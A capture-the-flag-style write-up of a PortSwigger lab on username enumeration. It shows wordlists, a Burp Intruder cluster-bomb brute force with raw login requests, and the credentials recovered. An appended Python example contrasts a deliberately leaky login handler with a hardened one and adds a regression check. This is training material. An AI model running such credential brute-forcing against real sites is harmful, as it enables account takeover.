Username enumeration via subtly different responses
Solution
Create wordlists with users and passwords
From website: https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-subtly-different-responses
---
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Username enumeration via subtly different responses]
└─$ head -n2 *.txt
==> pass.txt <==
123456
password
==> user.txt <==
carlos
root
┌──(kali㉿kali)-[~/Desktop/writeups/PortSwigger/Port_Swigger_Username enumeration via subtly different responses]
└─$
Open the website: https://0ae30013032944e680927178001800cb.web-security-academy.net/login
Brute-force login and password - Intruder
Choose attack type: "Cluster bomb"
Load the local wordlists as the payload sets for the payload positions
---
POST /login HTTP/2
Host: 0ae30013032944e680927178001800cb.web-security-academy.net
Cookie: session=RInLSl1fkoteuODZMoRILdZ8AorqHlcF
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: https://0ae30013032944e680927178001800cb.web-security-academy.net
Referer: https://0ae30013032944e680927178001800cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=admin&password=pass
Found correct creds - Intruder
Found correct login and password
U: user
P: pepper
Focus on response only: 73kb
---
POST /login HTTP/2
Host: 0ae30013032944e680927178001800cb.web-security-academy.net
Cookie: session=RInLSl1fkoteuODZMoRILdZ8AorqHlcF
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: https://0ae30013032944e680927178001800cb.web-security-academy.net
Referer: https://0ae30013032944e680927178001800cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

username=user&password=pepper
Log in as user: user
POST /login HTTP/2
Host: 0ae30013032944e680927178001800cb.web-security-academy.net
Cookie: session=RInLSl1fkoteuODZMoRILdZ8AorqHlcF
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0ae30013032944e680927178001800cb.web-security-academy.net
Referer: https://0ae30013032944e680927178001800cb.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=user&password=pepper
Solved
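The root cause behind this lab, shown from the defender's side as an added example (not part of the original writeup and not PortSwigger's code): a login handler whose failure responses differ slightly depending on whether the username exists, next to a hardened version and a regression check. The user store, function names, messages and the one-character difference are all constructed for illustration.

```python
import hashlib
import hmac
import os


def _hash(password: str, salt: bytes) -> bytes:
    # Iteration count kept low so the example runs quickly.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)


# Constructed sample user store (assumption): username -> (salt, hash).
_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _hash("correct horse", _SALT))}
# Dummy record so unknown usernames cost the same hashing work as known ones.
_DUMMY = (os.urandom(16), os.urandom(32))

GENERIC_ERROR = "Invalid username or password."


def login_vulnerable(username: str, password: str) -> tuple:
    """Failure bodies differ by one character depending on user existence."""
    record = USERS.get(username)
    if record is None:
        return 200, "Invalid username or password."
    if not hmac.compare_digest(_hash(password, record[0]), record[1]):
        return 200, "Invalid username or password"  # trailing period missing
    return 302, ""


def login_hardened(username: str, password: str) -> tuple:
    """One constant failure response and the same hashing work on every path."""
    salt, expected = USERS.get(username, _DUMMY)
    ok = hmac.compare_digest(_hash(password, salt), expected)
    if ok and username in USERS:
        return 302, ""
    return 200, GENERIC_ERROR


def failure_responses_leak(login) -> bool:
    """Regression check: True if a wrong password for a known user is
    distinguishable from an attempt against an unknown user."""
    known = login("alice", "wrong-password")
    unknown = login("no-such-user", "wrong-password")
    return known != unknown
```

Running `failure_responses_leak` against the real login endpoint in CI (comparing status, headers and body) catches this class of regression before release; pair it with per-account and per-source rate limiting.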